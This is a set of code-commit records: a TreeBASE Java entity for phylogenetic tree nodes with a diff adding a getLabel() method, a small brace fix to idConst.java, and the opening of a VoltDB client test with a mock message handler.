"treeCache") @BatchSize(size = 40) public class PhyloTreeNode extends AbstractPersistedObject implements TreeNode { private static final long serialVersionUID = 1L; private String mName; private Double mBranchLength; private int mNodeDepth; private long mLeftNode; private long mRightNode; private PhyloTree mTree; private PhyloTreeNode mChildNode; private PhyloTreeNode mSiblingNode; private NodeAttribute mNodeAttribute; private TaxonLabel mTaxonLabel; // used internally to navigate the inverse relationships. private PhyloTreeNode mParentNode; //private PhyloTreeNode mInverseChild; //private PhyloTreeNode mInverseSibling; /** * Constructor. */ public PhyloTreeNode() { super(); } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getNodeDepth() */ @Column(name = "nodeDepth", nullable = true) public int getNodeDepth() { return mNodeDepth; } /** * Set the nodeDepth field. */ public void setNodeDepth(int pNewnodeDepth) { mNodeDepth = pNewnodeDepth; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getBranchLength() */ @Column(name = "BranchLength", nullable = true) public Double getBranchLength() { return mBranchLength; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setBranchLength(java.lang.String) */ public void setBranchLength(Double pNewBranchLength) { mBranchLength = pNewBranchLength; } /** * Return true if the branch length is defined. * * @return */ public boolean hasBranchLength() { return getBranchLength() != null; } /** * Return the RightNode field. * * @return long mRightNode */ @Column(name = "RightNode", nullable = true) public long getRightNode() { return mRightNode; } /** * Set the RightNode field. */ public void setRightNode(long pNewRightNode) { mRightNode = pNewRightNode; } /** * Return the LeftNode field. * * @return long mLeftNode */ @Column(name = "LeftNode", nullable = true) public long getLeftNode() { return mLeftNode; } /** * Set the LeftNode field. */ public void setLeftNode(long pNewLeftNode) { mLeftNode = pNewLeftNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getName() */ @Column(name = "Name", length = TBPersistable.COLUMN_LENGTH_STRING) public String getName() { return mName; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setName(java.lang.String) */ public void setName(String pNewName) { mName = pNewName; } /** * Return the Tree field. 
* * @return PhyloTree */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PHYLOTREE_ID", nullable = false) @Index(name = "TNODE_TREE_IDX") public PhyloTree getTree() { return mTree; } /** * This is for internal use only. Use the public method PhyloTree.addNode() instead. */ protected void setTree(PhyloTree pNewTree) { mTree = pNewTree; } /** * Return the TaxonLabel field. * * @return TaxonLabel */ //Use eager fetch since the taxonlabel is always needed after loading a node. @ManyToOne(cascade = {CascadeType.PERSIST, CascadeType.MERGE}, fetch = FetchType.EAGER) @JoinColumn(name = "TAXONLABEL_ID", nullable = true) @Index(name = "TNODE_TAXLABEL_IDX") public TaxonLabel getTaxonLabel() { return mTaxonLabel; } /** * Set the TaxonLabel field. */ public void setTaxonLabel(TaxonLabel pNewTaxonLabel) { mTaxonLabel = pNewTaxonLabel; } /** * Get the TaxonLabel as a String. Return an empty string if the node has no taxon label. */ @Transient public String getTaxonLabelAsString() { if (getTaxonLabel() != null) { return getTaxonLabel().getTaxonLabel(); } return null; } /** * Get the TaxonLabel as a String. If empty return the node name. */ @Transient public String getTaxonLabelOrName() { String label = getTaxonLabelAsString(); if (TreebaseUtil.isEmpty(label)) { return getName(); } return label; } /** * Return the SibilingNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "SIBLING_ID", nullable = true) protected PhyloTreeNode getSiblingNode() { return mSiblingNode; } /** * Set the SibilingNode field. */ protected void setSiblingNode(PhyloTreeNode pNewSibilingNode) { mSiblingNode = pNewSibilingNode; } /** * Return the ChildNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "CHILD_ID", nullable = true) protected PhyloTreeNode getChildNode() { return mChildNode; } /** * Set the ChildNode field. */ protected void setChildNode(PhyloTreeNode pNewChildNode) { mChildNode = pNewChildNode; } // /** // * Return the InverseSibling field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "siblingNode", fetch= FetchType.LAZY) // protected PhyloTreeNode getInverseSibling() { // return mInverseSibling; // } // // /** // * Set the InverseSibling field. // */ // protected void setInverseSibling(PhyloTreeNode pNewInverseSibling) { // mInverseSibling = pNewInverseSibling; // } // // /** // * Return the InverseChild field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "childNode", fetch = FetchType.LAZY) // protected PhyloTreeNode getInverseChild() { // return mInverseChild; // } // // /** // * Set the InverseChild field. // */ // protected void setInverseChild(PhyloTreeNode pNewInverseChild) { // mInverseChild = pNewInverseChild; // } // /** * * @see org.cipres.treebase.domain.tree.TreeNode#isRootNode() */ @Transient public boolean isRootNode() { return getParentNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#isLeaf() */ @Transient public boolean isLeaf() { return getChildNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getParentNode() */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PARENT_ID", nullable = true) public PhyloTreeNode getParentNode() { return mParentNode; } /** * This is for internal use only. Use the public methods addChildNode() * or PhyloTree.addNode() instead. 
*/ protected void setParentNode(PhyloTreeNode pParentNode) { mParentNode = pParentNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#addChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public void addChildNode(TreeNode pChild) { if (pChild == null || !(pChild instanceof PhyloTreeNode)) { return; } PhyloTreeNode bChild = (PhyloTreeNode) pChild; bChild.setParentNode(this); getTree().addTreeNode(bChild); if (getChildNode() == null) { setChildNode(bChild); } else { getChildNode().addSiblingNode(bChild); } } /** * Add a sibling node. This method does not set the parent node. It is done * by addChildNode(). * * @param pSibling */ private void addSiblingNode(PhyloTreeNode pSibling) { if (pSibling == null) { return; } if (getSiblingNode() == null) { setSiblingNode(pSibling); //Note: this is a private method so we don't need to call the following: //pSibling.setParentNode(this.getParentNode()); } else { getSiblingNode().addSiblingNode(pSibling); } } /** * * @see org.cipres.treebase.domain.tree.TreeNode#RemoveChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public boolean removeChildNode(TreeNode pChild) { if (pChild == null || getChildNode() == null || !(pChild instanceof PhyloTreeNode)) { return false; } //Note: remove a child node, ADD all the sub node from this child node. // So actually a clad is removed. PhyloTreeNode bChild = (PhyloTreeNode) pChild; boolean removed = false; if (getChildNode() == bChild) { PhyloTreeNode nextChild = bChild.getSiblingNode(); // if (nextChild != null) { // nextChild.setInverseChild(this); // nextChild.setInverseSibling(null); // } setChildNode(nextChild); bChild.setParentNode(null); removed = true; } else { removed = getChildNode().removeSibling(bChild); } return removed; } /** * Remove a sibling node. * * @param pSibling * @return true if the node is found and removed */ private boolean removeSibling(PhyloTreeNode pSibling) { if (pSibling == null || getSiblingNode() == null) { return false; } boolean removed = false; if (getSiblingNode() == pSibling) { PhyloTreeNode nextSibling = pSibling.getSiblingNode(); // if (nextSibling != null) { // nextSibling.setInverseSibling(this); // } setSiblingNode(nextSibling); // pSibling.setInverseChild(null); // pSibling.setInverseSibling(null); pSibling.setSiblingNode(null); pSibling.setParentNode(null); removed = true; } else { removed = getSiblingNode().removeSibling(pSibling); } return removed; } /** * Return the NodeAttribute field. * * @return NodeAttribute */ @ManyToOne(cascade = CascadeType.ALL, fetch = FetchType.LAZY) @JoinColumn(name = "NODEATTRIBUTE_ID", nullable = true) public NodeAttribute getNodeAttribute() { return mNodeAttribute; } /** * Set the NodeAttribute field. */ public void setNodeAttribute(NodeAttribute pNewNodeAttribute) { mNodeAttribute = pNewNodeAttribute; } /** * Return all the children for this node. * * @return */ @Transient public List<PhyloTreeNode> getChildNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode child = getChildNode(); if (child != null) { nodes.add(child); PhyloTreeNode sibling = child.getSiblingNode(); while (sibling != null) { nodes.add(sibling); sibling = sibling.getSiblingNode(); } } return nodes; } /* * TODO: In an annotated tree, there is a more efficient way to do this. * Simply select every node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. 
N.rightNode > this.rightNode * * To get them in order, simply sort by leftNode value; the least leftNode is the root, and the * greatest is the parent. To include this node itself, change < and > to <= and >=. */ /** * @return the list of nodes that are ancestors of this one, in order with the root last */ @Transient List<PhyloTreeNode> getAncestorNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode cur; for (cur = (PhyloTreeNode) this.getParentNode(); cur != null; cur = (PhyloTreeNode) cur.getParentNode()) { nodes.add(cur); } return nodes; } /** * Annotate the leftNode and rightNode members of this node and * all its child nodes in the tree. Afterwards, every node in the subtree rooted here * will have the following properties: * a.leftNode < b.leftNode < b.rightNode < a.rightNode whenever b is a child of a * (a.rightNode - a.leftNode + 1)/2 is the size of the tree rooted at a * * @param start The leftNode value that should be assigned to this node * @return The rightNode value that was assigned to this node * @author mjd */ public long updateSubtreeBounds(long start) { this.setLeftNode(start); for (PhyloTreeNode c : this.getChildNodes()) { start = c.updateSubtreeBounds(start+1); } this.setRightNode(start+1); return start+1; } /** * @return True if and only if the leftNode and rightNode elements have been set * @author mjd */ @Transient public boolean hasSubtreeBounds() { return this.getLeftNode() != 0 && this.getRightNode() != 0; } /** * * @param that some other node in the same tree * @return whether this node is an ancestor of that node * @author mjd */ public boolean isAncestorOf(PhyloTreeNode that) { return this.getLeftNode() < that.getLeftNode() && that.getRightNode() < this.getRightNode(); } /** * * @param that some other node in the same tree * @return whether this node is a descdendant of that node * @author mjd */ public boolean isDescendantOf(PhyloTreeNode that) { return that.isAncestorOf(this); } /** * * TODO: in an annotated tree, there is a much better way to do this. * we can do a single Hibernate query that selects the first node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. N.leftNode < that.leftNode * 3. N.rightNode > this.rightNode * 4. N.rightNode > that.rightNode * 6. order descending by this.leftNode */ /** * @param that some other node in the same tree * @return the lowest node in the chain of common ancestors of this node and that */ public PhyloTreeNode nearestCommonAncestor(PhyloTreeNode that) { for (PhyloTreeNode p : this.getAncestorNodes()) { if (p.isAncestorOf(that)) { return p; } } return null; // This should never happen } /* TODO: as with the methods above, there is an abbreviation for this when the tree is annotated */ /** * * @param n1 another node in the same tree * @param n2 another node in the same tree * @return whether n1 and n2 are more closely related to each other than either is to this node */ public boolean haveABCTopology(PhyloTreeNode n1, PhyloTreeNode n2) { return ! n1.nearestCommonAncestor(n2).isAncestorOf(this); } @Override @Transient public String getLabel() { return getTaxonLabelAsString(); } }
treebase-core/src/main/java/org/cipres/treebase/domain/tree/PhyloTreeNode.java
package org.cipres.treebase.domain.tree; import java.util.ArrayList; import java.util.List; import javax.persistence.AttributeOverride; import javax.persistence.CascadeType; import javax.persistence.Column; import javax.persistence.Entity; import javax.persistence.FetchType; import javax.persistence.JoinColumn; import javax.persistence.ManyToOne; import javax.persistence.OneToOne; import javax.persistence.Table; import javax.persistence.Transient; import org.hibernate.annotations.BatchSize; import org.hibernate.annotations.Cache; import org.hibernate.annotations.CacheConcurrencyStrategy; import org.hibernate.annotations.Index; import org.cipres.treebase.TreebaseUtil; import org.cipres.treebase.domain.AbstractPersistedObject; import org.cipres.treebase.domain.TBPersistable; import org.cipres.treebase.domain.taxon.TaxonLabel; /** * PhyloTreeNode.java * * The treebase implementation of a general tree node. * * Created on Mar 13, 2006 * * @author Jin Ruan * */ @Entity @Table(name = "PHYLOTREENODE") @AttributeOverride(name = "id", column = @Column(name = "PHYLOTREENODE_ID")) @Cache(usage = CacheConcurrencyStrategy.NONSTRICT_READ_WRITE, region = "treeCache") @BatchSize(size = 40) public class PhyloTreeNode extends AbstractPersistedObject implements TreeNode { private static final long serialVersionUID = 1L; private String mName; private Double mBranchLength; private int mNodeDepth; private long mLeftNode; private long mRightNode; private PhyloTree mTree; private PhyloTreeNode mChildNode; private PhyloTreeNode mSiblingNode; private NodeAttribute mNodeAttribute; private TaxonLabel mTaxonLabel; // used internally to navigate the inverse relationships. private PhyloTreeNode mParentNode; //private PhyloTreeNode mInverseChild; //private PhyloTreeNode mInverseSibling; /** * Constructor. */ public PhyloTreeNode() { super(); } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getNodeDepth() */ @Column(name = "nodeDepth", nullable = true) public int getNodeDepth() { return mNodeDepth; } /** * Set the nodeDepth field. */ public void setNodeDepth(int pNewnodeDepth) { mNodeDepth = pNewnodeDepth; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getBranchLength() */ @Column(name = "BranchLength", nullable = true) public Double getBranchLength() { return mBranchLength; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setBranchLength(java.lang.String) */ public void setBranchLength(Double pNewBranchLength) { mBranchLength = pNewBranchLength; } /** * Return true if the branch length is defined. * * @return */ public boolean hasBranchLength() { return getBranchLength() != null; } /** * Return the RightNode field. * * @return long mRightNode */ @Column(name = "RightNode", nullable = true) public long getRightNode() { return mRightNode; } /** * Set the RightNode field. */ public void setRightNode(long pNewRightNode) { mRightNode = pNewRightNode; } /** * Return the LeftNode field. * * @return long mLeftNode */ @Column(name = "LeftNode", nullable = true) public long getLeftNode() { return mLeftNode; } /** * Set the LeftNode field. */ public void setLeftNode(long pNewLeftNode) { mLeftNode = pNewLeftNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getName() */ @Column(name = "Name", length = TBPersistable.COLUMN_LENGTH_STRING) public String getName() { return mName; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setName(java.lang.String) */ public void setName(String pNewName) { mName = pNewName; } /** * Return the Tree field. 
* * @return PhyloTree */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PHYLOTREE_ID", nullable = false) @Index(name = "TNODE_TREE_IDX") public PhyloTree getTree() { return mTree; } /** * This is for internal use only. Use the public method PhyloTree.addNode() instead. */ protected void setTree(PhyloTree pNewTree) { mTree = pNewTree; } /** * Return the TaxonLabel field. * * @return TaxonLabel */ //Use eager fetch since the taxonlabel is always needed after loading a node. @ManyToOne(cascade = {CascadeType.PERSIST, CascadeType.MERGE}, fetch = FetchType.EAGER) @JoinColumn(name = "TAXONLABEL_ID", nullable = true) @Index(name = "TNODE_TAXLABEL_IDX") public TaxonLabel getTaxonLabel() { return mTaxonLabel; } /** * Set the TaxonLabel field. */ public void setTaxonLabel(TaxonLabel pNewTaxonLabel) { mTaxonLabel = pNewTaxonLabel; } /** * Get the TaxonLabel as a String. Return an empty string if the node has no taxon label. */ @Transient public String getTaxonLabelAsString() { if (getTaxonLabel() != null) { return getTaxonLabel().getTaxonLabel(); } return null; } /** * Get the TaxonLabel as a String. If empty return the node name. */ @Transient public String getTaxonLabelOrName() { String label = getTaxonLabelAsString(); if (TreebaseUtil.isEmpty(label)) { return getName(); } return label; } /** * Return the SibilingNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "SIBLING_ID", nullable = true) protected PhyloTreeNode getSiblingNode() { return mSiblingNode; } /** * Set the SibilingNode field. */ protected void setSiblingNode(PhyloTreeNode pNewSibilingNode) { mSiblingNode = pNewSibilingNode; } /** * Return the ChildNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "CHILD_ID", nullable = true) protected PhyloTreeNode getChildNode() { return mChildNode; } /** * Set the ChildNode field. */ protected void setChildNode(PhyloTreeNode pNewChildNode) { mChildNode = pNewChildNode; } // /** // * Return the InverseSibling field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "siblingNode", fetch= FetchType.LAZY) // protected PhyloTreeNode getInverseSibling() { // return mInverseSibling; // } // // /** // * Set the InverseSibling field. // */ // protected void setInverseSibling(PhyloTreeNode pNewInverseSibling) { // mInverseSibling = pNewInverseSibling; // } // // /** // * Return the InverseChild field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "childNode", fetch = FetchType.LAZY) // protected PhyloTreeNode getInverseChild() { // return mInverseChild; // } // // /** // * Set the InverseChild field. // */ // protected void setInverseChild(PhyloTreeNode pNewInverseChild) { // mInverseChild = pNewInverseChild; // } // /** * * @see org.cipres.treebase.domain.tree.TreeNode#isRootNode() */ @Transient public boolean isRootNode() { return getParentNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#isLeaf() */ @Transient public boolean isLeaf() { return getChildNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getParentNode() */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PARENT_ID", nullable = true) public PhyloTreeNode getParentNode() { return mParentNode; } /** * This is for internal use only. Use the public methods addChildNode() * or PhyloTree.addNode() instead. 
*/ protected void setParentNode(PhyloTreeNode pParentNode) { mParentNode = pParentNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#addChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public void addChildNode(TreeNode pChild) { if (pChild == null || !(pChild instanceof PhyloTreeNode)) { return; } PhyloTreeNode bChild = (PhyloTreeNode) pChild; bChild.setParentNode(this); getTree().addTreeNode(bChild); if (getChildNode() == null) { setChildNode(bChild); } else { getChildNode().addSiblingNode(bChild); } } /** * Add a sibling node. This method does not set the parent node. It is done * by addChildNode(). * * @param pSibling */ private void addSiblingNode(PhyloTreeNode pSibling) { if (pSibling == null) { return; } if (getSiblingNode() == null) { setSiblingNode(pSibling); //Note: this is a private method so we don't need to call the following: //pSibling.setParentNode(this.getParentNode()); } else { getSiblingNode().addSiblingNode(pSibling); } } /** * * @see org.cipres.treebase.domain.tree.TreeNode#RemoveChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public boolean removeChildNode(TreeNode pChild) { if (pChild == null || getChildNode() == null || !(pChild instanceof PhyloTreeNode)) { return false; } //Note: remove a child node, ADD all the sub node from this child node. // So actually a clad is removed. PhyloTreeNode bChild = (PhyloTreeNode) pChild; boolean removed = false; if (getChildNode() == bChild) { PhyloTreeNode nextChild = bChild.getSiblingNode(); // if (nextChild != null) { // nextChild.setInverseChild(this); // nextChild.setInverseSibling(null); // } setChildNode(nextChild); bChild.setParentNode(null); removed = true; } else { removed = getChildNode().removeSibling(bChild); } return removed; } /** * Remove a sibling node. * * @param pSibling * @return true if the node is found and removed */ private boolean removeSibling(PhyloTreeNode pSibling) { if (pSibling == null || getSiblingNode() == null) { return false; } boolean removed = false; if (getSiblingNode() == pSibling) { PhyloTreeNode nextSibling = pSibling.getSiblingNode(); // if (nextSibling != null) { // nextSibling.setInverseSibling(this); // } setSiblingNode(nextSibling); // pSibling.setInverseChild(null); // pSibling.setInverseSibling(null); pSibling.setSiblingNode(null); pSibling.setParentNode(null); removed = true; } else { removed = getSiblingNode().removeSibling(pSibling); } return removed; } /** * Return the NodeAttribute field. * * @return NodeAttribute */ @ManyToOne(cascade = CascadeType.ALL, fetch = FetchType.LAZY) @JoinColumn(name = "NODEATTRIBUTE_ID", nullable = true) public NodeAttribute getNodeAttribute() { return mNodeAttribute; } /** * Set the NodeAttribute field. */ public void setNodeAttribute(NodeAttribute pNewNodeAttribute) { mNodeAttribute = pNewNodeAttribute; } /** * Return all the children for this node. * * @return */ @Transient public List<PhyloTreeNode> getChildNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode child = getChildNode(); if (child != null) { nodes.add(child); PhyloTreeNode sibling = child.getSiblingNode(); while (sibling != null) { nodes.add(sibling); sibling = sibling.getSiblingNode(); } } return nodes; } /* * TODO: In an annotated tree, there is a more efficient way to do this. * Simply select every node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. 
N.rightNode > this.rightNode * * To get them in order, simply sort by leftNode value; the least leftNode is the root, and the * greatest is the parent. To include this node itself, change < and > to <= and >=. */ /** * @return the list of nodes that are ancestors of this one, in order with the root last */ @Transient List<PhyloTreeNode> getAncestorNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode cur; for (cur = (PhyloTreeNode) this.getParentNode(); cur != null; cur = (PhyloTreeNode) cur.getParentNode()) { nodes.add(cur); } return nodes; } /** * Annotate the leftNode and rightNode members of this node and * all its child nodes in the tree. Afterwards, every node in the subtree rooted here * will have the following properties: * a.leftNode < b.leftNode < b.rightNode < a.rightNode whenever b is a child of a * (a.rightNode - a.leftNode + 1)/2 is the size of the tree rooted at a * * @param start The leftNode value that should be assigned to this node * @return The rightNode value that was assigned to this node * @author mjd */ public long updateSubtreeBounds(long start) { this.setLeftNode(start); for (PhyloTreeNode c : this.getChildNodes()) { start = c.updateSubtreeBounds(start+1); } this.setRightNode(start+1); return start+1; } /** * @return True if and only if the leftNode and rightNode elements have been set * @author mjd */ @Transient public boolean hasSubtreeBounds() { return this.getLeftNode() != 0 && this.getRightNode() != 0; } /** * * @param that some other node in the same tree * @return whether this node is an ancestor of that node * @author mjd */ public boolean isAncestorOf(PhyloTreeNode that) { return this.getLeftNode() < that.getLeftNode() && that.getRightNode() < this.getRightNode(); } /** * * @param that some other node in the same tree * @return whether this node is a descdendant of that node * @author mjd */ public boolean isDescendantOf(PhyloTreeNode that) { return that.isAncestorOf(this); } /** * * TODO: in an annotated tree, there is a much better way to do this. * we can do a single Hibernate query that selects the first node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. N.leftNode < that.leftNode * 3. N.rightNode > this.rightNode * 4. N.rightNode > that.rightNode * 6. order descending by this.leftNode */ /** * @param that some other node in the same tree * @return the lowest node in the chain of common ancestors of this node and that */ public PhyloTreeNode nearestCommonAncestor(PhyloTreeNode that) { for (PhyloTreeNode p : this.getAncestorNodes()) { if (p.isAncestorOf(that)) { return p; } } return null; // This should never happen } /* TODO: as with the methods above, there is an abbreviation for this when the tree is annotated */ /** * * @param n1 another node in the same tree * @param n2 another node in the same tree * @return whether n1 and n2 are more closely related to each other than either is to this node */ public boolean haveABCTopology(PhyloTreeNode n1, PhyloTreeNode n2) { return ! n1.nearestCommonAncestor(n2).isAncestorOf(this); } }
Added getLabel() for NeXML and RDF serialization.
treebase-core/src/main/java/org/cipres/treebase/domain/tree/PhyloTreeNode.java
Added getLabel() for NeXML and RDF serialization.
<ide><path>reebase-core/src/main/java/org/cipres/treebase/domain/tree/PhyloTreeNode.java <ide> public boolean haveABCTopology(PhyloTreeNode n1, PhyloTreeNode n2) { <ide> return ! n1.nearestCommonAncestor(n2).isAncestorOf(this); <ide> } <add> <add> @Override <add> @Transient <add> public String getLabel() { <add> return getTaxonLabelAsString(); <add> } <ide> }
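An aside on the nested-set bookkeeping used by updateSubtreeBounds() and isAncestorOf() in PhyloTreeNode above: the Javadoc invariant (a.leftNode < b.leftNode < b.rightNode < a.rightNode whenever b lies under a) is easiest to see on a tiny tree. The sketch below is a stripped-down stand-in rather than the TreeBASE entity; it only reproduces the numbering scheme, so the bounds assigned to a root with two leaf children can be read off directly.

import java.util.ArrayList;
import java.util.List;

// Simplified stand-in for PhyloTreeNode, kept only to show the left/right numbering.
public class BoundsSketch {
    long left;
    long right;
    final List<BoundsSketch> children = new ArrayList<>();

    // Mirrors updateSubtreeBounds(): pre-order left values, post-order right values.
    long number(long start) {
        left = start;
        for (BoundsSketch c : children) {
            start = c.number(start + 1);
        }
        right = start + 1;
        return right;
    }

    boolean isAncestorOf(BoundsSketch that) {
        return left < that.left && that.right < right;
    }

    public static void main(String[] args) {
        BoundsSketch root = new BoundsSketch();
        BoundsSketch a = new BoundsSketch();
        BoundsSketch b = new BoundsSketch();
        root.children.add(a);
        root.children.add(b);
        root.number(1);
        // Bounds come out as root [1,6], a [2,3], b [4,5], so the invariant and the
        // subtree-size formula (right - left + 1) / 2 == 3 both hold for the root.
        System.out.println(root.isAncestorOf(a) + " " + root.isAncestorOf(b) + " " + a.isAncestorOf(b));
    }
}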
Java
mpl-2.0
52bb7d7f351e26d6db092b0d5b0230e4227da96d
0
HKervadec/PrjCompil,HKervadec/PrjCompil
public class idConst extends Ident{ }
idConst.java
public class idConst( )
Update idConst.java braces
idConst.java
Update idConst.java
<ide><path>dConst.java <del> <del>public class idConst( <del>) <add>public class idConst extends Ident{ <add>}
Java
agpl-3.0
0614a7ca4c7f60475f6bc0acb3a1885a0ac85a64
0
flybird119/voltdb,ingted/voltdb,simonzhangsm/voltdb,wolffcm/voltdb,flybird119/voltdb,deerwalk/voltdb,zuowang/voltdb,paulmartel/voltdb,creative-quant/voltdb,wolffcm/voltdb,deerwalk/voltdb,VoltDB/voltdb,migue/voltdb,creative-quant/voltdb,kobronson/cs-voltdb,migue/voltdb,ingted/voltdb,paulmartel/voltdb,creative-quant/voltdb,kumarrus/voltdb,migue/voltdb,paulmartel/voltdb,creative-quant/voltdb,simonzhangsm/voltdb,kobronson/cs-voltdb,kobronson/cs-voltdb,ingted/voltdb,paulmartel/voltdb,kumarrus/voltdb,zuowang/voltdb,wolffcm/voltdb,kumarrus/voltdb,simonzhangsm/voltdb,paulmartel/voltdb,migue/voltdb,paulmartel/voltdb,deerwalk/voltdb,ingted/voltdb,deerwalk/voltdb,kumarrus/voltdb,wolffcm/voltdb,kumarrus/voltdb,kumarrus/voltdb,zuowang/voltdb,flybird119/voltdb,kobronson/cs-voltdb,wolffcm/voltdb,VoltDB/voltdb,paulmartel/voltdb,VoltDB/voltdb,simonzhangsm/voltdb,wolffcm/voltdb,kumarrus/voltdb,VoltDB/voltdb,flybird119/voltdb,kobronson/cs-voltdb,kobronson/cs-voltdb,zuowang/voltdb,flybird119/voltdb,VoltDB/voltdb,creative-quant/voltdb,flybird119/voltdb,deerwalk/voltdb,migue/voltdb,wolffcm/voltdb,deerwalk/voltdb,zuowang/voltdb,simonzhangsm/voltdb,ingted/voltdb,ingted/voltdb,ingted/voltdb,deerwalk/voltdb,simonzhangsm/voltdb,kobronson/cs-voltdb,VoltDB/voltdb,deerwalk/voltdb,kumarrus/voltdb,zuowang/voltdb,simonzhangsm/voltdb,migue/voltdb,ingted/voltdb,simonzhangsm/voltdb,paulmartel/voltdb,wolffcm/voltdb,zuowang/voltdb,creative-quant/voltdb,kobronson/cs-voltdb,flybird119/voltdb,flybird119/voltdb,creative-quant/voltdb,migue/voltdb,zuowang/voltdb,creative-quant/voltdb,migue/voltdb,VoltDB/voltdb
/* This file is part of VoltDB. * Copyright (C) 2008-2010 VoltDB Inc. * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. * IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ package org.voltdb.client; import java.io.IOException; import java.net.InetSocketAddress; import java.nio.ByteBuffer; import java.nio.channels.ServerSocketChannel; import java.nio.channels.SocketChannel; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; import junit.framework.TestCase; import org.junit.Test; import org.voltdb.ClientResponseImpl; import org.voltdb.StoredProcedureInvocation; import org.voltdb.VoltTable; import org.voltdb.VoltType; import org.voltdb.messaging.FastDeserializer; import org.voltdb.network.Connection; import org.voltdb.network.QueueMonitor; import org.voltdb.network.VoltNetwork; import org.voltdb.network.VoltProtocolHandler; public class TestDistributer extends TestCase { class MockInputHandler extends VoltProtocolHandler { @Override public int getMaxRead() { return 8192; } @Override public void handleMessage(ByteBuffer message, Connection c) { try { FastDeserializer fds = new FastDeserializer(message); StoredProcedureInvocation spi = fds.readObject(StoredProcedureInvocation.class); VoltTable vt[] = new VoltTable[1]; vt[0] = new VoltTable(new VoltTable.ColumnInfo("Foo", VoltType.BIGINT)); vt[0].addRow(1); ClientResponseImpl response = new ClientResponseImpl(ClientResponseImpl.SUCCESS, vt, "Extra String", spi.getClientHandle()); c.writeStream().enqueue(response); roundTrips.incrementAndGet(); System.err.println("Sending response."); } catch (Exception ex) { ex.printStackTrace(); } } @Override public int getExpectedOutgoingMessageSize() { return 2048; } @Override public void started(Connection c) { // TODO Auto-generated method stub } @Override public void starting(Connection c) { // TODO Auto-generated method stub } @Override public void stopped(Connection c) { // TODO Auto-generated method stub } @Override public void stopping(Connection c) { // TODO Auto-generated method stub } AtomicInteger roundTrips = new AtomicInteger(); @Override public Runnable offBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public Runnable onBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public QueueMonitor writestreamMonitor() { return null; } } // A fake server. 
